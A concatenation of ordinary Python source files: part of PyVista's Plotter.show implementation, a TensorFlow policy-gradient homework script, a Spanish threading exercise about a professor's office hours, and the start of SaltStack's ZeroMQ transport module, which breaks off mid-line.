self._theme.depth_peeling.enabled: if self.enable_depth_peeling(): for renderer in self.renderers: renderer.enable_depth_peeling() log.debug('Plotter init stop') def show( self, title=None, window_size=None, interactive=True, auto_close=None, interactive_update=False, full_screen=None, screenshot=False, return_img=False, cpos=None, use_ipyvtk=None, jupyter_backend=None, return_viewer=False, return_cpos=None, **kwargs, ): """Display the plotting window. Parameters ---------- title : str, optional Title of plotting window. Defaults to :attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`. window_size : list, optional Window size in pixels. Defaults to :attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`. interactive : bool, optional Enabled by default. Allows user to pan and move figure. Defaults to :attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`. auto_close : bool, optional Exits plotting session when user closes the window when interactive is ``True``. Defaults to :attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`. interactive_update : bool, optional Disabled by default. Allows user to non-blocking draw, user should call :func:`BasePlotter.update` in each iteration. full_screen : bool, optional Opens window in full screen. When enabled, ignores ``window_size``. Defaults to :attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`. screenshot : str, pathlib.Path, BytesIO or bool, optional Take a screenshot of the initial state of the plot. If a string, it specifies the path to which the screenshot is saved. If ``True``, the screenshot is returned as an array. Defaults to ``False``. For interactive screenshots it's recommended to first call ``show()`` with ``auto_close=False`` to set the scene, then save the screenshot in a separate call to ``show()`` or :func:`Plotter.screenshot`. return_img : bool Returns a numpy array representing the last image along with the camera position. cpos : list(tuple(floats)) The camera position. You can also set this with :attr:`Plotter.camera_position`. use_ipyvtk : bool, optional Deprecated. Instead, set the backend either globally with ``pyvista.set_jupyter_backend('ipyvtklink')`` or with ``backend='ipyvtklink'``. jupyter_backend : str, optional Jupyter notebook plotting backend to use. One of the following: * ``'none'`` : Do not display in the notebook. * ``'pythreejs'`` : Show a ``pythreejs`` widget * ``'static'`` : Display a static figure. * ``'ipygany'`` : Show a ``ipygany`` widget * ``'panel'`` : Show a ``panel`` widget. This can also be set globally with :func:`pyvista.set_jupyter_backend`. return_viewer : bool, optional Return the jupyterlab viewer, scene, or display object when plotting with jupyter notebook. return_cpos : bool, optional Return the last camera position from the render window when enabled. Default based on theme setting. See :attr:`pyvista.themes.DefaultTheme.return_cpos`. **kwargs : dict, optional Developer keyword arguments. Returns ------- cpos : list List of camera position, focal point, and view up. Returned only when ``return_cpos=True`` or set in the default global or plot theme. Not returned when in a jupyter notebook and ``return_viewer=True``. image : np.ndarray Numpy array of the last image when either ``return_img=True`` or ``screenshot=True`` is set. Not returned when in a jupyter notebook with ``return_viewer=True``. Optionally contains alpha values. Sized: * [Window height x Window width x 3] if the theme sets ``transparent_background=False``. * [Window height x Window width x 4] if the theme sets ``transparent_background=True``. widget IPython widget when ``return_viewer=True``. Notes ----- Please use the ``q``-key to close the plotter as some operating systems (namely Windows) will experience issues saving a screenshot if the exit button in the GUI is pressed. Examples -------- Simply show the plot of a mesh. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.show() Take a screenshot interactively. Screenshot will be of the first image shown, so use the first call with ``auto_close=False`` to set the scene before taking the screenshot. >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.show(auto_close=False) # doctest:+SKIP >>> pl.show(screenshot='my_image.png') # doctest:+SKIP Display a ``pythreejs`` scene within a jupyter notebook >>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP Return a ``pythreejs`` scene. >>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP Obtain the camera position when using ``show``. >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Sphere()) >>> pl.show(return_cpos=True) # doctest:+SKIP [(2.223005211686484, -0.3126909484828709, 2.4686209867735065), (0.0, 0.0, 0.0), (-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)] """ # developer keyword argument: runs a function immediately prior to ``close`` self._before_close_callback = kwargs.pop('before_close_callback', None) jupyter_kwargs = kwargs.pop('jupyter_kwargs', {}) assert_empty_kwargs(**kwargs) if interactive_update and auto_close is None: auto_close = False elif interactive_update and auto_close: warnings.warn( textwrap.dedent( """ The plotter will close immediately automatically since ``auto_close=True``. Either, do not specify ``auto_close``, or set it to ``False`` if you want to interact with the plotter interactively. """ ).strip() ) elif auto_close is None: auto_close = self._theme.auto_close if use_ipyvtk: txt = textwrap.dedent( """ use_ipyvtk is deprecated. Set the backend globally with ``pyvista.set_jupyter_backend("ipyvtklink") or with ``backend="ipyvtklink"`` """ ).strip() from pyvista.core.errors import DeprecationError raise DeprecationError(txt) if not hasattr(self, "ren_win"): raise RuntimeError("This plotter has been closed and cannot be shown.") if full_screen is None: full_screen = self._theme.full_screen if full_screen: self.ren_win.SetFullScreen(True) self.ren_win.BordersOn() # super buggy when disabled else: if window_size is None: window_size = self.window_size else: self._window_size_unset = False self.ren_win.SetSize(window_size[0], window_size[1]) # reset unless camera for the first render unless camera is set self._on_first_render_request(cpos) # handle plotter notebook if jupyter_backend and not self.notebook: warnings.warn( 'Not within a jupyter notebook environment.\nIgnoring ``jupyter_backend``.' ) if self.notebook: from ..jupyter.notebook import handle_plotter if jupyter_backend is None: jupyter_backend = self._theme.jupyter_backend if jupyter_backend != 'none': disp = handle_plotter( self, backend=jupyter_backend, return_viewer=return_viewer, **jupyter_kwargs ) return disp self.render() # This has to be after the first render for some reason if title is None: title = self.title if title: self.ren_win.SetWindowName(title) self.title = title # Keep track of image for sphinx-gallery if pyvista.BUILDING_GALLERY or screenshot: # always save screenshots for sphinx_gallery self.last_image = self.screenshot(screenshot, return_img=True) self.last_image_depth = self.get_image_depth() # See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270 if interactive and not self.off_screen: try: # interrupts will be caught here log.debug('Starting iren') self.iren.update_style() if not interactive_update: # Resolves #1260 if os.name == 'nt': if _vtk.VTK9: self.iren.process_events() else: global VERY_FIRST_RENDER if not VERY_FIRST_RENDER: self.iren.start() VERY_FIRST_RENDER = False self.iren.start() self.iren.initialize() except KeyboardInterrupt: log.debug('KeyboardInterrupt') self.close() raise KeyboardInterrupt # In the event that the user hits the exit-button on the GUI (on # Windows OS) then it must be finalized and deleted as accessing it # will kill the kernel. # Here we check for that and clean it up before moving on to any of # the closing routines that might try to still access that # render window. if not self.ren_win.IsCurrent(): self._clear_ren_win() # The ren_win is deleted # proper screenshots cannot be saved if this happens if not auto_close: warnings.warn( "`auto_close` ignored: by clicking the exit button, " "you have destroyed the render window and we have to " "close it out." ) auto_close = True # NOTE: after this point, nothing from the render window can be accessed # as if a user presed the close button, then it destroys the # the render view and a stream of errors will kill the Python # kernel if code here tries to access that renderer. # See issues #135 and #186 for insight before editing the # remainder of this function. # Close the render window if requested if auto_close: self.close() # If user asked for screenshot, return as numpy array after camera # position if return_img or screenshot is True: if return_cpos: return self.camera_position, self.last_image if return_cpos: return self.camera_position def add_title(self, title, font_size=18, color=None, font=None, shadow=False): """Add text to the top center of the plot. This is merely a convenience method that calls ``add_text`` with ``position='upper_edge'``. Parameters ---------- title : str The text to add the rendering. font_size : float, optional Sets the size of the title font. Defaults to 16 or the value of the global theme if set. color : color_like, optional, Either a string, rgb list, or hex color string. Defaults to white or the value of the global theme if set. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` font : str, optional Font name may be ``'courier'``, ``'times'``, or ``'arial'``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. Returns ------- vtk.vtkTextActor Text actor added to plot. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.background_color = 'grey' >>> actor = pl.add_title('Plot Title', font='courier', color='k', ... font_size=40) >>> pl.show() """ # add additional spacing from the top of the figure by default title = '\n' + title return self.add_text( title, position='upper_edge', font_size=font_size, color=color, font=font, shadow=shadow, name='title', viewport=False, ) def add_cursor( self, bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0), focal_point=(0.0, 0.0, 0.0), color=None, ): """Add a cursor of a PyVista or VTK dataset to the scene. Parameters ---------- bounds : length 6 sequence Specify the bounds in the format of: - ``(xmin, xmax, ymin, ymax, zmin, zmax)`` Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``. focal_point : list or tuple, optional The focal point of the cursor. Defaults to ``(0.0, 0.0, 0.0)``. color : color_like, optional Either a string, RGB sequence, or hex color string. For one of the following. * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` Returns ------- vtk.vtkActor VTK actor of the 2D cursor. Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(sphere) >>> _ = plotter.add_cursor() >>> plotter.show() """ alg = _vtk.vtkCursor3D() alg.SetModelBounds(bounds) alg.SetFocalPoint(focal_point) alg.AllOn() mapper = make_mapper(_vtk.vtkDataSetMapper) mapper.SetInputConnection(alg.GetOutputPort()) actor, prop = self.add_actor(mapper) prop.SetColor(Color(color).float_rgb) return actor # Tracks created plotters. At the end of the file as we need to # define ``BasePlotter`` before including it in the type definition. _ALL_PLOTTERS: Dict[str, BasePlotter] = {} def _kill_display(disp_id): # pragma: no cover """Forcibly close the display on Linux. See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584 And more details into why... https://stackoverflow.com/questions/64811503 Notes ----- This is to be used experimentally and is known to cause issues on `pyvistaqt` """ if platform.system() != 'Linux': raise OSError('This method only works on Linux') if disp_id: cdisp_id = int(disp_id[1:].split('_')[0], 16) # this is unsafe as events might be queued, but sometimes the # window fails to close if we don't just close it Thread(target=X11.XCloseDisplay, args=(cdisp_id,)).start()
train_pg.py
import numpy as np import tensorflow as tf import gym import logz import scipy.signal import os import time import inspect from multiprocessing import Process #============================================================================================# # Utilities #============================================================================================# def build_mlp( input_placeholder, output_size, scope, n_layers=2, size=64, activation=tf.tanh, output_activation=None ): #========================================================================================# # ----------SECTION 3---------- # Network building # # Your code should make a feedforward neural network (also called a multilayer perceptron) # with 'n_layers' hidden layers of size 'size' units. # # The output layer should have size 'output_size' and activation 'output_activation'. # # Hint: use tf.layers.dense #========================================================================================# with tf.variable_scope(scope): inputs = input_placeholder for _ in range(n_layers): inputs = tf.layers.dense(inputs=inputs, units=size, activation=activation) outputs = tf.layers.dense(inputs=inputs, units=output_size, activation=output_activation) return outputs def pathlength(path): return len(path["reward"]) #============================================================================================# # Policy Gradient #============================================================================================# def train_PG(exp_name='', env_name='CartPole-v0', n_iter=100, gamma=1.0, min_timesteps_per_batch=1000, max_path_length=None, learning_rate=5e-3, reward_to_go=True, animate=True, logdir=None, normalize_advantages=True, nn_baseline=False, seed=0, # network arguments n_layers=1, size=32 ): start = time.time() # Configure output directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] locals_ = locals() params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) # Make the gym environment env = gym.make(env_name) # Is this env continuous, or discrete? discrete = isinstance(env.action_space, gym.spaces.Discrete) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps #========================================================================================# # Notes on notation: # # Symbolic variables have the prefix sy_, to distinguish them from the numerical values # that are computed later in the function # # Prefixes and suffixes: # ob - observation # ac - action # _no - this tensor should have shape (batch size /n/, observation dim) # _na - this tensor should have shape (batch size /n/, action dim) # _n - this tensor should have shape (batch size /n/) # # Note: batch size /n/ is defined at runtime, and until then, the shape for that axis # is None #========================================================================================# # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # ----------SECTION 4---------- # Placeholders # # Need these for batch observations / actions / advantages in policy gradient loss function. #========================================================================================# sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32) if discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32) # Define a placeholder for advantages sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) #========================================================================================# # ----------SECTION 4---------- # Networks # # Make symbolic operations for # 1. Policy network outputs which describe the policy distribution. # a. For the discrete case, just logits for each action. # # b. For the continuous case, the mean / log std of a Gaussian distribution over # actions. # # Hint: use the 'build_mlp' function you defined in utilities. # # Note: these ops should be functions of the placeholder 'sy_ob_no' # # 2. Producing samples stochastically from the policy distribution. # a. For the discrete case, an op that takes in logits and produces actions. # # Should have shape [None] # # b. For the continuous case, use the reparameterization trick: # The output from a Gaussian distribution with mean 'mu' and std 'sigma' is # # mu + sigma * z, z ~ N(0, I) # # This reduces the problem to just sampling z. (Hint: use tf.random_normal!) # # Should have shape [None, ac_dim] # # Note: these ops should be functions of the policy network output ops. # # 3. Computing the log probability of a set of actions that were actually taken, # according to the policy. # # Note: these ops should be functions of the placeholder 'sy_ac_na', and the # policy network output ops. # #========================================================================================# if discrete: # Hint: use the 'build_mlp' function you defined in utilities. sy_logits_na = build_mlp(sy_ob_no, ac_dim, "discrete", n_layers=n_layers, size=size) # Hint: Use the tf.multinomial op. sy_sampled_ac = tf.multinomial(sy_logits_na, 1)[0] mask = tf.one_hot(sy_ac_na, ac_dim) log_prob = tf.nn.log_softmax(sy_logits_na) sy_logprob_n = tf.reduce_sum(tf.multiply(mask, log_prob), axis=1) else: # Hint: use the 'build_mlp' function you defined in utilities. sy_mean = build_mlp(sy_ob_no, ac_dim, "continuous", n_layers=n_layers, size=size) # logstd should just be a trainable variable, not a network output. sy_logstd = tf.Variable(tf.zeros([ac_dim])) # Hint: use tf.random_normal. sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal([ac_dim]) # Hint: Use the log probability under a multivariate gaussian. power = tf.divide(tf.square(sy_ac_na - sy_mean), -2*tf.square(tf.exp(sy_logstd))) prob = float(1)/np.sqrt(2*np.pi) * tf.divide(tf.exp(power), tf.exp(sy_logstd)) sy_logprob_n = tf.reduce_sum(tf.log(prob), axis=1) #========================================================================================# # ----------SECTION 4---------- # Loss Function and Training Operation #========================================================================================# # Loss function that we'll differentiate to get the policy gradient. loss = -tf.reduce_mean(sy_logprob_n * sy_adv_n) update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss) #========================================================================================# # ----------SECTION 5---------- # Optional Baseline #========================================================================================# if nn_baseline: baseline_prediction = tf.squeeze(build_mlp( sy_ob_no, 1, "nn_baseline", n_layers=n_layers, size=size)) # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. # YOUR_CODE_HERE sy_base_n = tf.placeholder(shape=[None], name="base", dtype=tf.float32) bl_loss = tf.nn.l2_loss(sy_base_n - baseline_prediction) baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(bl_loss) #========================================================================================# # Tensorflow Engineering: Config, Session, Variable initialization #========================================================================================# tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) sess = tf.Session(config=tf_config) sess.__enter__() # equivalent to `with sess:` tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: ob = env.reset() obs, acs, rewards = [], [], [] animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate) steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.05) obs.append(ob) ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]}) ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > max_path_length: break path = {"observation" : np.array(obs), "reward" : np.array(rewards), "action" : np.array(acs)} paths.append(path) timesteps_this_batch += pathlength(path) if timesteps_this_batch > min_timesteps_per_batch: break total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) #====================================================================================# # ----------SECTION 4---------- # Computing Q-values # # Your code should construct numpy arrays for Q-values which will be used to compute # advantages (which will in turn be fed to the placeholder you defined above). # # Recall that the expression for the policy gradient PG is # # PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] # # where # # tau=(s_0, a_0, ...) is a trajectory, # Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), # and b_t is a baseline which may depend on s_t. # # You will write code for two cases, controlled by the flag 'reward_to_go': # # Case 1: trajectory-based PG # # (reward_to_go = False) # # Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over # entire trajectory (regardless of which time step the Q-value should be for). # # For this case, the policy gradient estimator is # # E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] # # where # # Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. # # Thus, you should compute # # Q_t = Ret(tau) # # Case 2: reward-to-go PG # # (reward_to_go = True) # # Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting # from time step t. Thus, you should compute # # Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} # # # Store the Q-values for all timesteps and all trajectories in a variable 'q_n', # like the 'ob_no' and 'ac_na' above. # #====================================================================================# # YOUR_CODE_HERE q_n = [] for path in paths: reward = path["reward"] if not reward_to_go: discounted_reward = np.sum([gamma**t*reward[t] for t in range(len(reward))]) * np.ones(len(reward)) else: discount = np.array([gamma**t for t in range(len(reward))]) discounted_reward = np.array([np.dot(discount[:len(reward)-t], reward[t:]) for t in range(len(reward))]) q_n.append(discounted_reward) q_n = np.concatenate(q_n) #====================================================================================# # ----------SECTION 5---------- # Computing Baselines #====================================================================================# if nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current or previous batch of Q-values. (Goes with Hint # #bl2 below.) b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no:ob_no}) normalized_b_n = (b_n - np.mean(b_n)) / np.std(b_n) b_n = normalized_b_n * np.std(q_n) + np.mean(q_n) adv_n = q_n - b_n else: adv_n = q_n.copy() #====================================================================================# # ----------SECTION 4---------- # Advantage Normalization #====================================================================================# if normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. # YOUR_CODE_HERE adv_n = (adv_n - np.mean(adv_n)) / np.std(adv_n) #====================================================================================# # ----------SECTION 5---------- # Optimizing Neural Network Baseline #====================================================================================# if nn_baseline: # ----------SECTION 5---------- # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 above.) # YOUR_CODE_HERE rescale = (q_n - np.mean(q_n)) / np.std(q_n) sess.run(baseline_update_op, feed_dict={sy_base_n:rescale, sy_ob_no:ob_no}) #====================================================================================# # ----------SECTION 4---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. # # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. # YOUR_CODE_HERE loss_before = sess.run(loss, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) sess.run(update_op, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) loss_after = sess.run(loss, feed_dict={sy_ob_no:ob_no, sy_ac_na:ac_na, sy_adv_n:adv_n}) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("loss before update", loss_before) logz.log_tabular("loss after update", loss_after) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument('env_name', type=str) parser.add_argument('--exp_name', type=str, default='vpg') parser.add_argument('--render', action='store_true') parser.add_argument('--discount', type=float, default=1.0) parser.add_argument('--n_iter', '-n', type=int, default=100) parser.add_argument('--batch_size', '-b', type=int, default=1000) parser.add_argument('--ep_len', '-ep', type=float, default=-1.) parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3) parser.add_argument('--reward_to_go', '-rtg', action='store_true') parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true') parser.add_argument('--nn_baseline', '-bl', action='store_true') parser.add_argument('--seed', type=int, default=1) parser.add_argument('--n_experiments', '-e', type=int, default=1) parser.add_argument('--n_layers', '-l', type=int, default=1) parser.add_argument('--size', '-s', type=int, default=32) args = parser.parse_args() if not(os.path.exists('data')): os.makedirs('data') logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S") logdir = os.path.join('data', logdir) if not(os.path.exists(logdir)): os.makedirs(logdir) max_path_length = args.ep_len if args.ep_len > 0 else None for e in range(args.n_experiments): seed = args.seed + 10*e print('Running experiment with seed %d'%seed) def train_func(): train_PG( exp_name=args.exp_name, env_name=args.env_name, n_iter=args.n_iter, gamma=args.discount, min_timesteps_per_batch=args.batch_size, max_path_length=max_path_length, learning_rate=args.learning_rate, reward_to_go=args.reward_to_go, animate=args.render, logdir=os.path.join(logdir,'%d'%seed), normalize_advantages=not(args.dont_normalize_advantages), nn_baseline=args.nn_baseline, seed=seed, n_layers=args.n_layers, size=args.size ) # Awkward hacky process runs, because Tensorflow does not like # repeatedly calling train_PG in the same thread. p = Process(target=train_func, args=tuple()) p.start() p.join() # exp_name='', # env_name='CartPole-v0', # n_iter=100, # gamma=1.0, # min_timesteps_per_batch=1000, # max_path_length=None, # learning_rate=5e-3, # reward_to_go=True, # animate=True, # logdir=None, # normalize_advantages=True, # nn_baseline=False, # seed=0, # # network arguments # n_layers=1, # size=32 if __name__ == "__main__": main()
tarea2.py
""" Un profesor de la facultad asesora a varios estudiantes y estamos en su horario de atencion Mision: modelar la interaccicon durante este horario de modo que la espera (para todos) sea lo mas corta posible * Un profesor tiene x sillas en su cubiculo - Cuando no hay alumnos que atender, las sillas sirven como sofa, y el profesor se acuesta a dormir la siesta * Los alumnos pueden tocar a su puerta en cualquier momento, pero no pueden entrar mas de x alumnos * Para evitar coinfundir al profesor, solo un alumno puede presentar su duda (y esperar a su respuesta) al mismo tiempo. * Los demas alumnos sentados deben esperar pacientemente su turno * Cada alumno puede preguntar desde 1 y hasta 'y' preguntas (permitiendo que los demas alumnos pregunten entre una y otra) DEFINICIONES PROPIAS: 1. La probabilidad de llegada de un alumno es de 0.5 2. Pueden entrar al cubiculo una vez que se hayan juntado 3 alumnos 3. se manejaran un maximo de 5 dudas por alumno por fines visualizacion en la ejecucion """ import threading import time import random alumnos_sentados = [] mutex = threading.Semaphore(1) barrera = threading.Semaphore(0) contador_alumnos = 0 def alumno(id): global mutex, barrera, contador_alumnos #llego un alumno if len(alumnos_sentados) < 5: #verifica si tiene espacio en el cubiculo mutex.acquire() print('\033[;37malumno sentadito: \033[;36m'+ str(id) ) alumnos_sentados.append(id) contador_alumnos += 1 mutex.release() barrera.release() else: #si no hay lugar se duerme y espera a que se desocupe print(f"\033[;37malumno \033[;36m{id} \033[;37mdice: no hay lugar mejor me duermo") time.sleep(random.random()) pass def profesor(): global mutex, barrera, contador_alumnos while True: print("\033[;33mESPERANDO A QUE SE JUNTEN ALUMNOS") print(f"\033[;35mHAY {contador_alumnos} ALUMNOS EN ESPERA") #verifica si hay alumnos esperando ser atendidos if contador_alumnos >= 3: # pasa grupo de 3 alumnos print(f"\033[;32mPASANDO GRUPO DE {contador_alumnos} ALUMNOS") barrera.acquire() while alumnos_sentados: # mientras haya alumnos en su cubiculo a = alumnos_sentados.pop() # atendemos las dudas del primer alumno contador_alumnos -= 1 for duda in range(random.randint(1,5)): print(f'\033[;37mATENDIENDO SU DUDA # \033[;31m{duda} \033[;37mALUMNO \033[;36m{a}') time.sleep(random.random()) else: print('\033[;37mMIMIDO, NO MOLESTAR') #si no se ha juntado grupo de alumnos el profesor duerme time.sleep(5) threading.Thread(target = profesor).start() id = 0 while True: threading.Thread(target=alumno,args=[id]).start() id += 1 time.sleep(random.random()) if id >= 10: time.sleep(random.randint(10,15))
zeromq.py
""" Zeromq transport classes """ import errno import hashlib import logging import os import signal import sys import threading from random import randint import salt.auth import salt.crypt import salt.ext.tornado import salt.ext.tornado.concurrent import salt.ext.tornado.gen import salt.ext.tornado.ioloop import salt.log.setup import salt.payload import salt.transport.client import salt.transport.mixins.auth import salt.transport.server import salt.utils.event import salt.utils.files import salt.utils.minions import salt.utils.process import salt.utils.stringutils import salt.utils.verify import salt.utils.versions import salt.utils.zeromq import zmq.error import zmq.eventloop.ioloop import zmq.eventloop.zmqstream from salt._compat import ipaddress from salt.exceptions import SaltException, SaltReqTimeoutError from salt.utils.zeromq import LIBZMQ_VERSION_INFO, ZMQ_VERSION_INFO, zmq try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False try: from M2Crypto import RSA HAS_M2 = True except ImportError: HAS_M2 = False try: from Cryptodome.Cipher import PKCS1_OAEP except ImportError: from Crypto.Cipher import PKCS1_OAEP # nosec log = logging.getLogger(__name__) def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None): """ Return the ZeroMQ URI to connect the Minion to the Master. It supports different source IP / port, given the ZeroMQ syntax: // Connecting using a IP address and bind to an IP address rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0); Source: http://api.zeromq.org/4-1:zmq-tcp """ from salt.utils.zeromq import ip_bracket master_uri = "tcp://{master_ip}:{master_port}".format( master_ip=ip_bracket(master_ip), master_port=master_port ) if source_ip or source_port: if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1): # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6 # which is included in the pyzmq wheels starting with 16.0.1. if source_ip and source_port: master_uri = ( "tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format( source_ip=ip_bracket(source_ip), source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port, ) ) elif source_ip and not source_port: master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format( source_ip=ip_bracket(source_ip), master_ip=ip_bracket(master_ip), master_port=master_port, ) elif source_port and not source_ip: ip_any = ( "0.0.0.0" if ipaddress.ip_address(master_ip).version == 4 else ip_bracket("::") ) master_uri = ( "tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format( ip_any=ip_any, source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port, ) ) else: log.warning( "Unable to connect to the Master using a specific source IP / port" ) log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6") log.warning( "Specific source IP / port for connecting to master returner port:" " configuraion ignored" ) return master_uri class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel): """ Encapsulate sending routines to ZeroMQ. ZMQ Channels default to 'crypt=aes' """ async_methods = [ "crypted_transfer_decode_dictentry", "_crypted_transfer", "_do_transfer", "_uncrypted_transfer", "send", ] close_methods = [ "close", ] def __init__(self, opts, **kwargs): self.opts = dict(opts) self.ttype = "zeromq" # crypt defaults to 'aes' self.crypt = kwargs.get("crypt", "aes") if "master_uri" in kwargs: self.opts["master_uri"] = kwargs["master_uri"] self._io_loop = kwargs.get("io_loop") if self._io_loop is None: self._io_loop = salt.ext.tornado.ioloop.IOLoop.current() if self.crypt != "clear": # we don't need to worry about auth as a kwarg, since its a singleton self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop) log.debug( "Connecting the Minion to the Master URI (for the return server): %s", self.master_uri, ) self.message_client = AsyncReqMessageClientPool( self.opts, args=( self.opts, self.master_uri, ), kwargs={"io_loop": self._io_loop}, ) self._closing = False def close(self): """ Since the message_client creates sockets and assigns them to the IOLoop we have to specifically destroy them, since we aren't the only ones with references to the FDs """ if self._closing: return log.debug("Closing %s instance", self.__class__.__name__) self._closing = True if hasattr(self, "message_client"): self.message_client.close() # pylint: disable=W1701 def __del__(self): try: self.close() except OSError as exc: if exc.errno != errno.EBADF: # If its not a bad file descriptor error, raise raise # pylint: enable=W1701 @property def master_uri(self): if "master_uri" in self.opts: return self.opts["master_uri"] # if by chance master_uri is not there.. if "master_ip" in self.opts: return _get_master_uri( self.opts["master_ip"], self.opts["master_port"], source_ip=self.opts.get("source_ip"), source_port=self.opts.get("source_ret_port"), ) # if we've reached here something is very abnormal raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts") def _package_load(self, load): return { "enc": self.crypt, "load": load, } @salt.ext.tornado.gen.coroutine def crypted_transfer_decode_dictentry( self, load, dictkey=None, tries=3, timeout=60 ): if not self.auth.authenticated: # Return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() # Return control to the caller. When send() completes, resume by populating ret with the Future.result ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) key = 